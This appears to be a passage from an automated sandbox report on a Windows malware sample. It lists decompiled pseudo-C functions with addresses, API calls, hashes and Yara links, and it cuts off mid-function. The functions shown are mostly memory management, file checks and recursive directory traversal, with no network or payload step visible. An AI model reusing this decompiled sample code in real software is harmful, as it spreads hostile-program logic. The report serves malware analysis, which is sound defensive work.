Instruction Fuzzy Hash: 65A012C682120114CC1071F1220375A0144E4C02CC38448A62350B00C2C83CE501001D

Uniqueness

Uniqueness Score: -1.00%

Function 00404CF8, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CF8(CHAR* __eax) {
				long _t4;
				void* _t5;
				void* _t9;

				_t4 = GetFileAttributesA(__eax); // executed
				_t5 = _t4 + 1;
				_t9 = _t5;
				if(_t9 != 0) {
					return _t5 - 0x00000001 & 0 | _t9 != 0x00000000;
				}
				return _t5;
			}

0x00404cf9
0x00404cfe
0x00404cfe
0x00404cff
0x00000000
0x00404d04
0x00404d07

APIs

GetFileAttributesA.KERNEL32(?,00404E3F,00000000,00404E9F,?,?,00000000,00000000,00000000,00000000,?,00407724,00000000,004079DC,?,0000144A), ref: 00404CF9

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fa09aa8577ef24e7db2a883e088881ac01214e5b91045ece1593abeed7d9ba31
Instruction ID: 74a4a45bf51c4893599122cbb6035ce0c32fa2704c567f2e8b32d3ffb48088ed
Opcode Fuzzy Hash: fa09aa8577ef24e7db2a883e088881ac01214e5b91045ece1593abeed7d9ba31
Instruction Fuzzy Hash: 66A002C686650749DD1022E56607AAE0249FCD12D8B9D5D665391FA1C2C93CA992902E

Uniqueness

Uniqueness Score: -1.00%

Function 00404BB4, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BB4(void* __eax, signed int __ecx, long __edx) {
				long _t2;

				_t2 = SetFilePointer(__eax, __edx, 0, __ecx & 0x000000ff); // executed
				return _t2;
			}

0x00404bbc
0x00404bc1

APIs

SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,004071C9,00000000,0040720F,?,00000000), ref: 00404BBC

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
Instruction ID: 68b303876a78b47fa373b2f01407b4ce5b79aa50a67d4c8f5d0a49418ed6adba
Opcode Fuzzy Hash: 7cf7d094e1152e8ce2a36ef2ea1d814d027d71488bb8302382125c90c8a75838
Instruction Fuzzy Hash: 69A002D85902203AF8182363AC5FF37105C97C0B55FD0855E7351754C164EC6A241039

Uniqueness

Uniqueness Score: -1.00%

Function 0040137C, Relevance: 1.3, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040137C(void* __eax, intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v20;
				intOrPtr _v24;
				void* _v28;
				intOrPtr* _v32;
				intOrPtr* _t24;
				intOrPtr _t27;
				intOrPtr _t31;
				int _t32;
				intOrPtr* _t35;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t45;

				_t45 =  &_v20;
				_v32 = __ecx;
				 *_t45 = __edx;
				_v28 = 0xffffffff;
				_v24 = 0;
				_t44 = __eax;
				_v20 =  *_t45 + __eax;
				_t35 =  *0x40a5d4; // 0x40a5d4
				while(_t35 != 0x40a5d4) {
					_t42 =  *_t35;
					_t5 = _t35 + 8; // 0x0
					_t43 =  *_t5;
					if(_t44 <= _t43) {
						_t6 = _t35 + 0xc; // 0x0
						if(_t43 +  *_t6 <= _v20) {
							if(_t43 < _v28) {
								_v28 = _t43;
							}
							_t10 = _t35 + 0xc; // 0x0
							_t31 = _t43 +  *_t10;
							if(_t31 > _v24) {
								_v24 = _t31;
							}
							_t32 = VirtualFree(_t43, 0, 0x8000); // executed
							if(_t32 == 0) {
								 *0x40a5b0 = 1;
							}
							E00401184(_t35);
						}
					}
					_t35 = _t42;
				}
				_t24 = _v32;
				 *_t24 = 0;
				if(_v24 == 0) {
					return _t24;
				}
				 *_v32 = _v28;
				_t27 = _v24 - _v28;
				 *((intOrPtr*)(_v32 + 4)) = _t27;
				return _t27;
			}

0x00401380
0x00401383
0x00401387
0x0040138a
0x00401394
0x00401398
0x0040139f
0x004013a3
0x004013fc
0x004013ab
0x004013ad
0x004013ad
0x004013b2
0x004013b6
0x004013bd
0x004013c3
0x004013c5
0x004013c5
0x004013cb
0x004013cb
0x004013d2
0x004013d4
0x004013d4
0x004013e0
0x004013e7
0x004013e9
0x004013e9
0x004013f5
0x004013f5
0x004013bd
0x004013fa
0x004013fa
0x00401404
0x0040140a
0x00401411
0x00401433
0x00401433
0x0040141b
0x00401421
0x00401429
0x00000000

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004013E0

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b3f1c77c9a82428dc6568712acca71c6867497a5d50ad774a7e16de62942a854
Instruction ID: f327295f0dbb7d02968337953404c96d08b75f0734ec548ae522820371e35f3d
Opcode Fuzzy Hash: b3f1c77c9a82428dc6568712acca71c6867497a5d50ad774a7e16de62942a854
Instruction Fuzzy Hash: CB21E570608741AFD710DF19C880A5FBBE0EB85720F14C96AE8989B7A5D378E841DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401434, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401434(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x40a5d4; // 0x40a5d4
				while(_t29 != 0x40a5d4) {
					_t7 = _t29 + 8; // 0x0
					_t17 =  *_t7;
					_t8 = _t29 + 0xc; // 0x0
					_t27 =  *_t8 + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x0040143b
0x0040143f
0x00401446
0x0040145b
0x00401463
0x00401469
0x0040146f
0x00401472
0x004014b6
0x0040147a
0x0040147a
0x0040147d
0x00401480
0x00401484
0x00401486
0x00401486
0x0040148c
0x0040148e
0x0040148e
0x00401494
0x004014a1
0x004014a8
0x004014aa
0x004014b0
0x00000000
0x004014b0
0x004014a8
0x004014b4
0x004014b4
0x004014c5

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 004014A1

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
Instruction ID: 651c7d6b6741c998796b49b102b161bb2341ec2eea25b0c045f05b7ed0c0d4f4
Opcode Fuzzy Hash: 6562d44be094aac9c3416d4300413632571bdfff9e6fcfdcc884fc208ae27054
Instruction Fuzzy Hash: E7117072A04701AFC310DF29CD80A2BB7E1EBC4750F15C63DE598673B5D638AC408795

Uniqueness

Uniqueness Score: -1.00%

Function 004014C8, Relevance: 1.3, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004014C8(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x40a5d4; // 0x40a5d4
				while(_t19 != 0x40a5d4) {
					_t2 = _t19 + 8; // 0x0
					_t9 =  *_t2;
					_t3 = _t19 + 0xc; // 0x0
					_t14 =  *_t3 + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x40a5b0 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}

0x004014cc
0x004014dd
0x004014e4
0x004014ed
0x004014f1
0x004014f4
0x004014f7
0x00401537
0x004014ff
0x004014ff
0x00401502
0x00401505
0x0040150a
0x0040150c
0x0040150c
0x00401511
0x00401513
0x00401513
0x00401517
0x00401522
0x00401529
0x0040152b
0x0040152b
0x00401529
0x00401535
0x00401535
0x00401544

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,?,?,00000000,00004003,0040172F), ref: 00401522

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
Instruction ID: c2f9954cc8299db513f2c37eb2bc070e0fd4fafed15322d1c8bcd52f3136bf23
Opcode Fuzzy Hash: 366ed2c7ca182d6b4595971b05bf8940527af6e3e06c25c2a4c3263d2ce5472b
Instruction Fuzzy Hash: E501F7736043006FC3109E28DDC092A77A4EBC5324F15053EDA85AB3A1D73AAC0587A8

Uniqueness

Uniqueness Score: -1.00%

Function 004010FC, Relevance: 1.3, APIs: 1, Instructions: 34
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004010FC() {
				intOrPtr* _t4;
				void* _t5;
				void _t6;
				intOrPtr* _t9;
				void* _t12;
				void* _t14;

				if( *0x40a5d0 != 0) {
					L5:
					_t4 =  *0x40a5d0;
					 *0x40a5d0 =  *_t4;
					return _t4;
				} else {
					_t5 = LocalAlloc(0, 0x644); // executed
					_t12 = _t5;
					if(_t12 != 0) {
						_t6 =  *0x40a5cc; // 0x0
						 *_t12 = _t6;
						 *0x40a5cc = _t12;
						_t14 = 0;
						do {
							_t2 = (_t14 + _t14) * 8; // 0x4
							_t9 = _t12 + _t2 + 4;
							 *_t9 =  *0x40a5d0;
							 *0x40a5d0 = _t9;
							_t14 = _t14 + 1;
						} while (_t14 != 0x64);
						goto L5;
					} else {
						return 0;
					}
				}
			}

0x00401106
0x00401142
0x00401142
0x00401146
0x0040114a
0x00401108
0x0040110f
0x00401114
0x00401118
0x0040111f
0x00401124
0x00401126
0x0040112c
0x0040112e
0x00401132
0x00401132
0x00401138
0x0040113a
0x0040113c
0x0040113d
0x00000000
0x0040111a
0x0040111e
0x0040111e
0x00401118

APIs

LocalAlloc.KERNEL32(00000000,00000644,?,0040A5E4,0040115F,?,?,004011FE,?,?,?,00000000,00004003,0040173F), ref: 0040110F

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: e704011d59091ef39bab40cf9f47e6c61213b0619fd5946ce42960c9093c2bc6
Instruction ID: b1887d2a642e31e89738e15f0efcd0894f0d6c0890685fd23c4a2ce375bb14e7
Opcode Fuzzy Hash: e704011d59091ef39bab40cf9f47e6c61213b0619fd5946ce42960c9093c2bc6
Instruction Fuzzy Hash: A9F082757012028FD728CF29DC81655B3E2FB9D315F20807EE285EB3A0E7358C518B48

Uniqueness

Uniqueness Score: -1.00%

Function 00404B90, Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B90(void* __eax) {
				signed int _t4;

				_t4 = CloseHandle(__eax); // executed
				return _t4 & 0xffffff00 | _t4 != 0x00000000;
			}

0x00404b91
0x00404b9b

APIs

CloseHandle.KERNEL32(00000000), ref: 00404B91

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
Instruction ID: f540dd3953723152695a7cfd94b4b723d26dbf970bde7b3718d3bc06e0259ed2
Opcode Fuzzy Hash: ef71f196dd3e8bd5321f6bf3e93503307ae4868d30203b0da39ae7c2a7e1010a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 004076C8, Relevance: .1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E004076C8(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v40254;
				char _v41488;
				char _v41492;
				char _v41496;
				intOrPtr _v41500;
				char _v41504;
				char _v41508;
				char _v41512;
				char _v41516;
				intOrPtr _v41520;
				char _v41524;
				char _v41528;
				char _v41532;
				char _v41536;
				void* _t49;
				void* _t101;
				intOrPtr _t133;
				intOrPtr _t137;
				intOrPtr _t138;

				_t100 = __ebx;
				_t137 = _t138;
				_t101 = 0x144b;
				do {
					_push(0);
					_push(0);
					_t101 = _t101 - 1;
					_t139 = _t101;
				} while (_t101 != 0);
				_push(_t101);
				_push(_t137);
				_push(0x4079dc);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41492, __ebx, _t101);
				_push( &_v41492);
				E004031F4( &_v41496, 9,  &E004091B4);
				_pop(_t49);
				E00403214(_t49, _v41496);
				E00404DE0(_v41492, __ebx); // executed
				E00405008( &_v41504, __ebx, 9);
				_push(_v41504);
				E004031F4( &_v41508, 9,  &E004091B4);
				_push(_v41508);
				E004031F4( &_v41512, 3, 0x4091dc);
				_push(_v41512);
				E004032CC();
				E00405200(_v41500, __ebx, __esi, _t139); // executed
				E004049D0(0, _t100,  &_v41516, __edi, __esi);
				_v8 = E00405B60(_v41516,  &_v41516);
				_push(_t137);
				_push(0x4078ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E00405008( &_v41524, _t100, 3);
				_push(_v41524);
				E004031F4( &_v41528, 9,  &E004091B4);
				_push(_v41528);
				E004049D0(0, _t100,  &_v41536, __edi, __esi);
				E00404ED0(_v41536,  &_v41532);
				_push(_v41532);
				E004032CC();
				_v12 = E00405B24(_v41520, 0x40000103);
				_push(_t137);
				_push(0x4078d2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t138;
				E0040597C(_v8);
				E00405974();
				E00405988(_v8);
				E0040254C( &_v40254, 4,  &_v16);
				E004070D0( &_v41488, _v16, 0x3e8);
				E0040598C(_v12);
				E00405974();
				E00405BE8(_v12, E0040597C(_v8) - 0x14400, _v8);
				_pop(_t133);
				 *[fs:eax] = _t133;
				_push(E004078D9);
				return E00404520(_v12);
			}

0x004076c8
0x004076c9
0x004076cb
0x004076d0
0x004076d0
0x004076d2
0x004076d4
0x004076d4
0x004076d4
0x004076d7
0x004076da
0x004076db
0x004076e0
0x004076e3
0x004076ec
0x004076f7
0x00407708
0x00407713
0x00407714
0x0040771f
0x0040772a
0x0040772f
0x00407745
0x0040774a
0x00407760
0x00407765
0x00407776
0x00407781
0x0040778e
0x0040779e
0x004077a3
0x004077a4
0x004077a9
0x004077ac
0x004077b5
0x004077ba
0x004077d0
0x004077d5
0x004077e3
0x004077f4
0x004077f9
0x0040780a
0x0040781f
0x00407824
0x00407825
0x0040782a
0x0040782d
0x00407833
0x00407843
0x00407856
0x00407869
0x0040787c
0x0040788f
0x0040789c
0x004078b7
0x004078be
0x004078c1
0x004078c4
0x004078d1

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246c4e9ee7460efe4d96dc7036f8af71d0b090c63c06e24d0a287ab82368aaaf
Instruction ID: 02de735c76515ef59b580e3435f0d59f46fa8ba2ce28a270ecf54980224172f0
Opcode Fuzzy Hash: 246c4e9ee7460efe4d96dc7036f8af71d0b090c63c06e24d0a287ab82368aaaf
Instruction Fuzzy Hash: 92515170B0021D9BDF10EB69CC51A8EB7B5EB4A308F1084FAA404772D1DB39AF418F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408178, Relevance: .1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 82%

			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _v24;
				char _v28;
				void* _v32;
				char _v36;
				intOrPtr _t26;
				void* _t36;
				void* _t47;
				void* _t48;
				intOrPtr _t71;
				void* _t79;
				void* _t81;
				void* _t86;

				_t86 = __fp0;
				_t81 = __eflags;
				_t76 = __esi;
				_t75 = __edi;
				_t54 = __ebx;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				E00403F14(0x4080e8);
				_push(_t79);
				_push(0x4082b4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe0;
				E004070D0(0x4091a8, 0xb, 0xb);
				E004070D0( &E004091B4, 9, 9);
				E004070D0(0x4091c0, 3, 3);
				E004070D0(0x4091dc, 3, 3);
				_t26 =  *0x409210; // 0x40919c
				E004070D0(_t26, 0xb, 0xb); // executed
				E0040712C(__ebx, __edi, __esi, _t81); // executed
				E004049D0(0, __ebx,  &_v24, __edi, __esi);
				if(E00404F6C(_v24) > 0xa200) {
					E004076C8(_t54, _t75, _t76); // executed
				}
				E00407F24(_t54, _t75, _t76); // executed
				_t60 = 3;
				_t70 = 3;
				E004070D0(0x4091c4, 3, 3);
				_t36 = E00404AE8(_t54, _t75, _t76);
				_t83 = _t36;
				if(_t36 != 0) {
					E004049D0(0, _t54,  &_v28, _t75, _t76);
					_push(_v28);
					_t60 = 3;
					E004031F4( &_v32, 3, 0x4091c4);
					_t70 = _v32;
					_pop(_t47);
					_t48 = E00407034(_t47, _t54, _v32, _t83);
					_t84 = _t48;
					if(_t48 != 0) {
						_t70 =  &_v36;
						E004049D0(1, _t54,  &_v36, _t75, _t76);
						E00407E30(_v36, _t54,  &_v36, _t75, _t76); // executed
					}
				}
				E004079F0(_t54, _t75, _t76, _t84); // executed
				E004075EC(_t54, _t60, _t70, _t75, _t76, _t84, _t86); // executed
				_pop(_t71);
				 *[fs:eax] = _t71;
				_push(0x4082bb);
				return E004030B8( &_v36, 4);
			}

0x00408178
0x00408178
0x00408178
0x00408178
0x00408178
0x00408180
0x00408183
0x00408186
0x00408189
0x00408191
0x00408198
0x00408199
0x0040819e
0x004081a1
0x004081b3
0x004081c7
0x004081db
0x004081ef
0x004081f4
0x00408203
0x00408208
0x00408212
0x00408224
0x00408226
0x00408226
0x0040822b
0x00408235
0x0040823a
0x0040823f
0x00408244
0x00408249
0x0040824b
0x00408252
0x0040825a
0x00408263
0x00408268
0x0040826d
0x00408270
0x00408271
0x00408276
0x00408278
0x0040827a
0x00408282
0x0040828a
0x0040828a
0x00408278
0x0040828f
0x00408294
0x0040829b
0x0040829e
0x004082a1
0x004082b3

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileFindModule$CloseFirstHandleName
String ID:
API String ID: 2572062711-0
Opcode ID: bc953bfd150c04056ce7d316d30f0c17dfc5197b6bddb42bc0e8a74ba14f7057
Instruction ID: 028e1b0117ada81f999a275674f13167eb1476f4105511bda65b889d37419372
Opcode Fuzzy Hash: bc953bfd150c04056ce7d316d30f0c17dfc5197b6bddb42bc0e8a74ba14f7057
Instruction Fuzzy Hash: E9211E70A042094BEB00F7B6C9527AF72A5DB89304F10857FE544BB3C2DB7D9D0187AA

Uniqueness

Uniqueness Score: -1.00%

Function 00407504, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00407504(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t34;
				intOrPtr _t62;
				void* _t71;
				void* _t72;
				void* _t74;
				intOrPtr _t77;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t77);
				_push(0x4075db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t77;
				E004031F4( &_v12, 3, 0x4091dc);
				_t49 = E004052AC(_v8, 0, _v12);
				_t71 = E0040532C(_t25) - 1;
				if(_t71 >= 0) {
					_t72 = _t71 + 1;
					_t74 = 0;
					do {
						_t34 = E0040534C(_t49, _t74);
						_t81 = _t34;
						if(_t34 == 0) {
							E00405338(_t49,  &_v28, _t74);
							E00403258( &_v24, _v28,  *((intOrPtr*)(_t49 + 0x1c)));
							E00407220(_v24, _t49, _t72, _t74); // executed
						} else {
							E00405338(_t49,  &_v20, _t74);
							E00403258( &_v16, _v20,  *((intOrPtr*)(_t49 + 0x1c)));
							E00407504(_v16, _t49, _t72, _t74, _t81, _a4); // executed
						}
						_t74 = _t74 + 1;
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				E00404520(_t49);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E004075E2);
				return E004030B8( &_v28, 6);
			}

0x00407509
0x0040750a
0x0040750b
0x0040750c
0x0040750d
0x0040750e
0x00407512
0x00407518
0x0040751f
0x00407520
0x00407525
0x00407528
0x00407538
0x0040754a
0x00407555
0x00407558
0x0040755a
0x0040755b
0x0040755d
0x00407561
0x00407566
0x00407568
0x0040759a
0x004075a8
0x004075b0
0x0040756a
0x00407575
0x00407583
0x0040758b
0x00407590
0x004075b5
0x004075b6
0x004075b6
0x0040755d
0x004075bb
0x004075c2
0x004075c5
0x004075c8
0x004075da

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bf24ce016c9e79977364e473c06de795f7ab42dfea8cb5e82324da780108447
Instruction ID: ba71799747bfcbec7348bdd8f09e20dc532a7a022b64f23993009ccde6034a4c
Opcode Fuzzy Hash: 6bf24ce016c9e79977364e473c06de795f7ab42dfea8cb5e82324da780108447
Instruction Fuzzy Hash: 79217730B04109ABCB04EF65DC529AF77A9EB85304B60447FB801B76C5DA78EE058755

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE0, Relevance: .1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00404DE0(char __eax, signed int __ebx) {
				void* _v8;
				char _v12;
				void* _v16;
				char _v20;
				void* _t45;
				intOrPtr _t55;
				intOrPtr _t64;
				void* _t65;
				void* _t68;

				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_v8 = __eax;
				E004033FC(_v8);
				_push(_t64);
				_push(0x404e9f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t64;
				_t65 = E0040320C(_v8);
				_t49 = __ebx & 0xffffff00 | _t65 > 0x00000000;
				if((__ebx & 0xffffff00 | _t65 > 0x00000000) != 0) {
					E00404DCC(_v8,  &_v12);
					E0040312C( &_v8, _v12);
					if(E0040320C(_v8) >= 3) {
						_t68 = E00404CF8(_v8);
						if(_t68 == 0) {
							E00404EEC( &_v16);
							E00403358(_v16, _v8);
							if(_t68 != 0) {
								E00404EEC( &_v20);
								_t45 = E00404DE0(_v20, _t49); // executed
								if(_t45 == 0 || E00404EB0(_v8) == 0) {
								}
							}
						}
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E00404EA6);
				return E004030B8( &_v20, 4);
			}

0x00404de5
0x00404de6
0x00404de7
0x00404de8
0x00404de9
0x00404dea
0x00404df0
0x00404df7
0x00404df8
0x00404dfd
0x00404e00
0x00404e0b
0x00404e0d
0x00404e12
0x00404e1a
0x00404e25
0x00404e35
0x00404e3f
0x00404e41
0x00404e49
0x00404e54
0x00404e59
0x00404e61
0x00404e69
0x00404e70
0x00404e70
0x00404e70
0x00404e59
0x00404e41
0x00404e35
0x00404e86
0x00404e89
0x00404e8c
0x00404e9e

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e4fc89c0d5fd27c05aac8c4d41e11325114b14bb7b57d765674d753e556bb47c
Instruction ID: 1dfd328e9d81c806f2c03a8771cfa584465e3ed9e3942cc4fd01b0b075e0960a
Opcode Fuzzy Hash: e4fc89c0d5fd27c05aac8c4d41e11325114b14bb7b57d765674d753e556bb47c
Instruction Fuzzy Hash: 712106B4600209EFDF00EFA5C94299EB7B8FF85304B5045BABA04B72D1D778AF04D658

Uniqueness

Uniqueness Score: -1.00%

Function 00406EE4, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00406EE4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t20;
				void* _t24;
				intOrPtr _t40;
				void* _t46;

				_push(__ebx);
				_v16 = 0;
				_v20 = 0;
				_push(_t46);
				_push(0x406f72);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				E00405008( &_v16, 1, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t20);
				E00403214(_t20, _v20);
				_t24 = E00404C78(E0040340C(_v16), 1, 8,  &_v12, __edi, __esi); // executed
				if(_t24 != 0) {
					E004057D8(__fp0);
					asm("fcomp dword [0x406f80]");
					asm("fnstsw ax");
					asm("sahf");
				}
				_pop(_t40);
				 *[fs:eax] = _t40;
				_push(E00406F79);
				return E004030B8( &_v20, 2);
			}

0x00406eea
0x00406eed
0x00406ef0
0x00406ef5
0x00406ef6
0x00406efb
0x00406efe
0x00406f06
0x00406f0e
0x00406f1c
0x00406f24
0x00406f25
0x00406f3a
0x00406f41
0x00406f43
0x00406f4b
0x00406f51
0x00406f53
0x00406f54
0x00406f59
0x00406f5c
0x00406f5f
0x00406f71

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LocalPathTempTime
String ID:
API String ID: 2118298429-0
Opcode ID: 5812a844e322630184c3e412ff79706d3924fd5f3eb3606b2518a53fc8c619b6
Instruction ID: 45953f95c73686c6e7a526584a69e5b0c7269d2a2f0497fde641f0aca3966107
Opcode Fuzzy Hash: 5812a844e322630184c3e412ff79706d3924fd5f3eb3606b2518a53fc8c619b6
Instruction Fuzzy Hash: CF015270A042099FDB00EFA1DC5199FB7BDFB45300F52857BE414F26C1DB38AA148AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406E5C, Relevance: .0, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00406E5C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, long long __fp0) {
				char _v12;
				char _v16;
				char _v20;
				intOrPtr* _t19;
				intOrPtr _t37;
				void* _t43;
				long long _t47;

				_t47 = __fp0;
				_v16 = 0;
				_v20 = 0;
				_push(_t43);
				_push(0x406ed8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				E004057D8(__fp0);
				_v12 = _t47;
				asm("wait");
				E00405008( &_v16, __ebx, __ecx);
				_push( &_v16);
				E004031F4( &_v20, 0xb, 0x40919c);
				_pop(_t19);
				E00403214(_t19, _v20);
				E00404BF8(E0040340C(_v16), __ebx, 8,  &_v12, __edi, __esi); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E00406EDF);
				return E004030B8( &_v20, 2);
			}

0x00406e5c
0x00406e64
0x00406e67
0x00406e6c
0x00406e6d
0x00406e72
0x00406e75
0x00406e78
0x00406e7d
0x00406e80
0x00406e84
0x00406e8c
0x00406e9a
0x00406ea2
0x00406ea3
0x00406eb8
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ed7

Memory Dump Source

Source File: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LocalPathTempTime
String ID:
API String ID: 2118298429-0
Opcode ID: 5385410f00ef27a4929b55825a413de038bf19070f1870cb7314bfd93179debd
Instruction ID: cd2f321b8c1115d81d975b051bd51da87534711c02565e3110c71300f1b34d61
Opcode Fuzzy Hash: 5385410f00ef27a4929b55825a413de038bf19070f1870cb7314bfd93179debd
Instruction Fuzzy Hash: BC0162759006089FDB00EFA5C85269EBBB8EB84304F51897BA414E36C1EB389A148A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040712C, Relevance: .0, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0040712C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t19;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x407176);
				_push( *[fs:eax]);
